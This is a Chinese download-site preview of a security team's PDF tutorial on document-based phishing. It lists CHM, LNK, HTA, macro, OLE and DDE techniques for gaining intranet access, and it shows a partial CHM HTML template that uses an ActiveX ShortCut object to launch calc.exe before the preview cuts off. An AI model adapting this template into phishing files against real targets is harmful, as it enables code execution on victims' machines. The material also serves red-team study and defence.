陌陌分享_文档钓鱼1
需积分: 0 32 浏览量
2022-08-03
19:32:00
上传
评论
收藏 3.32MB PDF 举报
陌陌分享 | 文档钓鱼
沃·兹基硕德小贴士
分享时间到!
作者述:见解有限,文章内容如有不当之处,请多多指正。
文档钓鱼至今仍是一种主流的钓鱼方式 ,对于一些难于通过 web 漏洞攻入内网的企业,使用鱼叉、水坑等方式进行钓鱼
攻击,可能是拿到内网权限的捷径。
我了解到使用文档进行钓鱼的方式大致分为CHM、LNK、HTA文件钓鱼、macros(office 宏)、OLE(对象链接与嵌
入)、DDE(动态数据交换)、利用 office的历史CVE漏洞。
CHM、LNK、HTA文件钓鱼
CHM
CHM(Compiled Help Manual)即“已编译的帮助文件”。它是微软新一代的帮助文件格式,利用 HTML 作源文,把帮
助内容以类似数据库的形式编译储存。
使用 EasyCHM 可以轻松的新建一个 chm 文件,首先新建一个文件夹,然后在文件夹中新建一个 html 文件,html 代
码如下。
1
2
3
4
5
6
7
8
9
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head
><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1
height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',calc.exe'>
<PARAM name="Item2" value="273,1,1">
残笑 今天陌陌安全
剩余12页未读,继续阅读
资源评论
林书尼
- 粉丝: 20
- 资源: 315
最新资源
- 使用 Python 和 Pygame 开发《星露谷物语》 游戏+源码(毕业设计&课程设计&项目开发)
- VOC4-123-1-321-32-1
- 【课程设计全套资料】一个基于JAVA-JSP企业合同管理系统
- bootstrap的css和js文件
- lda代码-checkpoint-checkpoint.ipynb
- 基于java局域网飞鸽传书软件设计与实现(源代码+论文).zip
- 基于python开发的魂斗罗游戏+源码(毕业设计&课程设计&项目开发)
- 停车场管理系统系统采用JAVAEE,利用SQLSERVER2005,B/S架构
- VOC数据集1-111111
- 基于python开发的乒乓球和滑雪游戏+源码(毕业设计&课程设计&项目开发)
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
